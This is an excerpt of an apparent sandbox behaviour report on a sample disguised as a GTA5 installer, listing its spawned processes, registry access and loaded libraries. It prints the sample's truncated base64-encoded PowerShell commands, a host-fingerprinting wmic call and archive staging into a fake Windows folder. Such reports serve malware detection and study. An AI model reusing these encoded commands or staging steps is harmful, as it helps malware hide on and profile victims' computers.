Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iw5mghv1.5q1.ps1

Jump to behavior

Source: GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp

Memory string: rustls::msgs::handshakeIllegal SNI hostname received

Source: GTA5-elamigos.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\GTA5-elamigos.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: GTA5-elamigos.exe	String found in binary or memory: deno test src/v8-flags-help
Source: GTA5-elamigos.exe	String found in binary or memory: Examples: https://github.com/WICG/import-maps#the-import-mapSet V8 command line options (for help: --v8-flags=--help)Watch for file changes and restart process automaticallyWatch for file changes and restart process automatically.
Source: GTA5-elamigos.exe	String found in binary or memory: Examples: https://github.com/WICG/import-maps#the-import-mapSet V8 command line options (for help: --v8-flags=--help)Watch for file changes and restart process automaticallyWatch for file changes and restart process automatically.
Source: GTA5-elamigos.exe	String found in binary or memory: Multi-address mappings are not yet supported

Source: C:\Users\user\Desktop\GTA5-elamigos.exe

File read: C:\Users\user\Desktop\GTA5-elamigos.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\GTA5-elamigos.exe "C:\Users\user\Desktop\GTA5-elamigos.exe"
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE4C.tmp" "c:\Users\user\AppData\Local\Temp\14ynqbdy\CSC1857152425CA4EAA8346B0B93220CD75.TMP"
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jmxyvs0r\jmxyvs0r.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES12D9.tmp" "c:\Users\user\AppData\Local\Temp\jmxyvs0r\CSC50638E4E3C724DF29F41E118778681D.TMP"
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get uuid /value
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path \"C:\WindowsTasks\Updates\Update-m876kK3CBP.zip\" -DestinationPath \"C:\WindowsTasks\Platform\App-rRrqar5TwQ\"
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAY	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAY	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get uuid /value	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path \"C:\WindowsTasks\Updates\Update-m876kK3CBP.zip\" -DestinationPath \"C:\WindowsTasks\Platform\App-rRrqar5TwQ\"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.cmdline"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE4C.tmp" "c:\Users\user\AppData\Local\Temp\14ynqbdy\CSC1857152425CA4EAA8346B0B93220CD75.TMP"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jmxyvs0r\jmxyvs0r.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES12D9.tmp" "c:\Users\user\AppData\Local\Temp\jmxyvs0r\CSC50638E4E3C724DF29F41E118778681D.TMP"	Jump to behavior

Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
